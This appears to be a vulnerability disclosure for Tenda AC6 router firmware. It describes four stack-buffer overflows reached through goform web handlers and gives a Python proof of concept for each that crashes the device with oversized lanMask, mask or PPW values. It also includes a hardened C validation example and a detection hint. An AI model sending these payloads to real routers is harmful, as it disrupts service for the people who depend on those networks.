Hello CVE auditor!
Here are some AC6 DoS vulnerability points and PoCs :p
thx

Affected version:
US_AC6V2.0RTL_V15.03.06.50_multi_TDE01.bin
## Stack Overflow

### fromAdvSetLanip (overflow arg: lanMask)

#### Vuln point
http://{target_ip}/goform/AdvSetLanip
#### Vulnerability analysis
We can find that the web form handlers are defined in formDefineTendDa().
In fromAdvSetLanip(), we control cp and v11; v13 is equal to the lan.ip value and is used shortly afterwards.
So we just need to make v13 differ from the lan.ip value, i.e. submit lanIp with some weird value such as "114.51.41.91".
Then we are almost there: v11 (lanMask, user-controllable) is passed to the guest_ip_check() function as its second argument.
In guest_ip_check(), a2 points to our controllable argument lanMask, which may be of unlimited length.
initIpAddrInfo() also uses our input as a2, and
we can clearly see that a2 is strcpy'd into the a4 area directly, without any length check; that is dangerous for the saved ra register on the stack. So where is the a4 area?
Going back to guest_ip_check(), we find that a4 points into this function's own stack frame, the local called v5.
In summary, we need to submit these values:
"lanMask": payload, "lanIp": "114.51.41.91" (or something else :p)
#### PoC
```python
import requests


def exp_AdvSetLanip(target_ip, cookie):
    url = f"http://{target_ip}/goform/AdvSetLanip"
    # oversized lanMask value: exceeds the fixed stack buffer copied by strcpy
    payload = b'a' * 0x30 + b'bbbb\x00'
    data = {
        "lanMask": payload,
        "lanIp": "114.5.14.19"
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response
```
#### Demo

### setDoublePppoeConfig -> guest_ip_check (overflow arg: mask)

#### Vuln point
http://{target_ip}/goform/WanParameterSetting
#### Vulnerability analysis
We can find that the web form handlers are defined in formDefineTendDa().
formWanParameterSetting() calls the formWanInfoSet() function; we don't even have to control wan1 to get in, because the default value of module is wan1.
Then formWanInfoSet() has a control point: we can set the wanType argument to "5", so v3 becomes (int)"5",
and we reach the branch that calls the vulnerable function setDoublePppoeConfig().
Once inside it,
we need to set vpnWanType = 0;
then we can use staticIp to overflow the stack.
In guest_ip_check(), a2 points to our controllable argument mask, which may be of unlimited length.
initIpAddrInfo() also uses our input as a2, and
we can clearly see that a2 is strcpy'd into the a4 area directly, without any length check; that is dangerous for the saved ra register on the stack. So where is the a4 area?
Going back to guest_ip_check(), we find that a4 points into this function's own stack frame, the local called v5.
In summary, we need to submit these values:
wanType: 5, vpnWanType: 0, mask: payload
#### PoC
```python
import requests


def exp_setDoublePppoeConfig(target_ip, cookie):
    url = f"http://{target_ip}/goform/WanParameterSetting"
    # oversized mask value: exceeds the fixed stack buffer copied by strcpy
    payload = b'a' * 0x920 + b'bbbb\x00'
    data = {
        "wanType": 5,
        "vpnWanType": 0,
        "mask": payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response
```
#### Demo

### setDoubleL2tpConfig -> guest_ip_check (overflow arg: mask)

#### Vuln point
http://{target_ip}/goform/formWanParameterSetting
#### Vulnerability analysis
We can find that the web form handlers are defined in formDefineTendDa().
formWanParameterSetting() calls the formWanInfoSet() function; we don't even have to control wan1 to get in, because the default value of module is wan1.
Then formWanInfoSet() has a control point: we can set the wanType argument to "4", so v3 becomes (int)"4",
and we reach the branch that calls the vulnerable function setDoubleL2tpConfig().
Once inside it,
we need to set vpnWanType (v11) = 0 and control v7 (mask), which is delivered to guest_ip_check();
then we can use staticIp to overflow the stack.
In guest_ip_check(), a2 points to our controllable argument mask, which may be of unlimited length.
initIpAddrInfo() also uses our input as a2, and
we can clearly see that a2 is strcpy'd into the a4 area directly, without any length check; that is dangerous for the saved ra register on the stack. So where is the a4 area?
Going back to guest_ip_check(), we find that a4 points into this function's own stack frame, the local called v5.
#### PoC
```python
import requests


def exp_setDoubleL2tpConfig(target_ip, cookie):
    url = f"http://{target_ip}/goform/WanParameterSetting"
    # oversized mask value: exceeds the fixed stack buffer copied by strcpy
    payload = b'a' * 0x920 + b'bbbb\x00'
    data = {
        "wanType": 4,
        "vpnWanType": 0,
        "mask": payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response
```
#### Demo

### fromWizardHandle (DoS)

#### Vuln point
http://{target_ip}/goform/WizardHandle
#### Vulnerability analysis
We can find that the web form handlers are defined in formDefineTendDa().
In case 2 the handler reads the request parameter PPW,
then passes the PPW pointer to decodePwd().
decodePwd() is simply a dangerously designed function: it copies everything in a1 to a2 without checking the length,
so the v54 stack area is in danger, and we can use PPW to overflow it.
However, there are many valuable slots between the overflowed value and ra,
and we also overwrite the a0 slot, which must point to a valid numeric ASCII string to be passed as the first argument of atoi,
so atoi finally ends in a segmentation fault.
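The root cause shared by all four handlers above is the same: a request parameter is copied with strcpy() (guest_ip_check()/initIpAddrInfo() for lanMask and mask, decodePwd() for PPW) into a fixed-size stack buffer with no length check. The block below is an added example written for this write-up, not Tenda's firmware code, showing how the copy should look on the defender's side: the IPv4-typed parameters are validated as a dotted quad (at most 15 characters) before any copy, and free-form parameters such as PPW go through a bounded copy that reports truncation instead of writing past the buffer. Function names, buffer sizes and the sample inputs are assumptions chosen for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not the firmware's code. Names and sizes are assumptions. */
#define IPV4_STR_MAX 16   /* "255.255.255.255" plus the NUL terminator */

/* Return 1 if s is a dotted-quad IPv4 string of at most 15 characters, else 0.
 * Overlong input is rejected by strnlen() before any character is inspected. */
int is_dotted_quad(const char *s) {
    if (s == NULL) return 0;
    size_t len = strnlen(s, IPV4_STR_MAX);
    if (len == 0 || len >= IPV4_STR_MAX) return 0;
    int octets = 0;
    const char *p = s;
    while (*p) {
        if (!isdigit((unsigned char)*p)) return 0;
        int val = 0, digits = 0;
        while (isdigit((unsigned char)*p) && digits < 3) {
            val = val * 10 + (*p - '0');
            p++;
            digits++;
        }
        /* more than 3 digits, or a value above 255, is not an octet */
        if (val > 255 || isdigit((unsigned char)*p)) return 0;
        octets++;
        if (*p == '.') {
            p++;
            if (*p == '\0') return 0;   /* trailing dot */
        } else if (*p != '\0') {
            return 0;                   /* stray character */
        }
    }
    return octets == 4;
}

/* Hardened analogue of the strcpy() in initIpAddrInfo(): validate first,
 * then copy with an explicit destination size. 0 on success, -1 if rejected. */
int copy_ipv4_param(char *dst, size_t dstsz, const char *src) {
    if (dst == NULL || dstsz < IPV4_STR_MAX) return -1;
    if (!is_dotted_quad(src)) return -1;
    snprintf(dst, dstsz, "%s", src);   /* always NUL-terminated, never past dstsz */
    return 0;
}

/* Bounded copy for free-form parameters such as PPW (cf. decodePwd()):
 * input that would not fit together with its NUL is rejected, not truncated silently. */
int copy_param_bounded(char *dst, size_t dstsz, const char *src) {
    if (dst == NULL || src == NULL || dstsz == 0) return -1;
    size_t len = strnlen(src, dstsz);
    if (len >= dstsz) return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Simulated handler with a local buffer like v5 in guest_ip_check():
 * the parameter can no longer reach the saved return address. */
int guest_ip_check_hardened(const char *mask) {
    char local[IPV4_STR_MAX];
    return copy_ipv4_param(local, sizeof local, mask);
}

int main(void) {
    /* constructed inputs: a sane mask and an overlong one of the size the PoCs send */
    char overlong[0x930];
    memset(overlong, 'a', sizeof overlong - 1);
    overlong[sizeof overlong - 1] = '\0';
    printf("255.255.255.0 -> %d\n", guest_ip_check_hardened("255.255.255.0"));
    printf("overlong      -> %d\n", guest_ip_check_hardened(overlong));
    return 0;
}
```

The validation runs on the request parameter before anything is written to the stack frame, so the length of the value sent to /goform/WanParameterSetting or /goform/AdvSetLanip no longer matters; a crash-based detection for the unpatched firmware would look for POSTs to these endpoints whose lanMask, mask or PPW values are far longer than a dotted quad.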
#### PoC
```python
import requests


def exp_WizardHandle(target_ip, cookie):
    url = f"http://{target_ip}/goform/WizardHandle"
    # oversized PPW value: exceeds the v54 stack buffer copied by decodePwd()
    payload = b'\x76' * 0x16C + b'bbbb\x00'
    data = {
        "WANT": 2,
        "PPW": payload
    }
    response = requests.post(url, cookies={'Cookie': cookie}, data=data)
    return response
```